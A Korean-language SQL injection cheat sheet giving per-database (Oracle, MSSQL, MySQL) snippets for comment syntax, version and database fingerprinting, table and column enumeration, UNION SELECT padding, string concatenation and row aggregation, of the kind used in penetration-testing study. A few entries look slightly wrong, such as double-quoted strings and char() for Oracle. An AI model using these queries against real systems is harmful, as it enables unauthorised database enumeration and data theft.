SQL Injection Cheat Sheet

주석문

Oracle

- --

MSSQL

- -- , /**/

MYSQL

- # , -- , /**/

 

데이터베이스 버전 정보

Oracle

- SELECT banner FROM v$version

- SELECT version FROM v$instance

MSSQL

- SELECT @@version

MySQL

- SELECT @@version

 

현재 데이터베이스

Oracle 

- SELECT instance_name FROM v$instance

MSSQL

- SELECT DB_NAME()

MySQL

- SELECT database()

 

테이블 목록

Oracle

- SELECT table_name FROM all_tables

MSSQL

- SELECT table_name FROM information_schema.tables 

- SELECT name FROM master..sysobjects WHERE xtype = 'U'

MySQL

- SELECT table_name FROM information_schema.tables

 

테이블 내 컬럼 목록

Oracle

- SELECT column_name FROM all_tab_columns WHERE table_name = "table name"

MSSQL

- SELECT column_name FROM information_schema.columns WHERE table_name = "table name"

- SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable')

MySQL

- SELECT column_name FROM information_schema.columns WHERE table_name = "table name"

 

UNION SELECT

Oracle

- UNION SELECT null, null

MSSQL

- UNION SELECT null, null

MySQL

- UNION SELECT null, null

 

문자열 합치기

Oracle

- SELECT concat("A","B")

- SELECT "A" || "B"

MSSQL

- SELECT "A"+"B"

MySQL

- SELECT concat("A","B")

 

한 행에 모두 출력

Oracle

- SELECT LISTAGG(column_name, ",") WITHIN GROUP(ORDER BY column_name) FROM table

MSSQL

- SELECT STUFF((SELECT ',' + column_name1 + '|' + column_name2 FROM table ORDER BY column_name2 FOR XML PATH(''), TYPE).value('.', 'NVARCHAR(MAX)'), 1, 1, '') FROM table

- SELECT STRING_AGG(coluname1, ',') AS ColumnName FROM table

MySQL

- SELECT group_concat(concat(column_name1, " ", column_name2)) FROM table

 

ASCII Number -> ASCII String , ASCII String -> ASCII Number

Oracle

- SELECT char(65) , SELECT ascii("A")

MSSQL

- SELECT char(65) , SELECT ascii("A")

MySQL

- SELECT char(65) , SELECT ascii("A")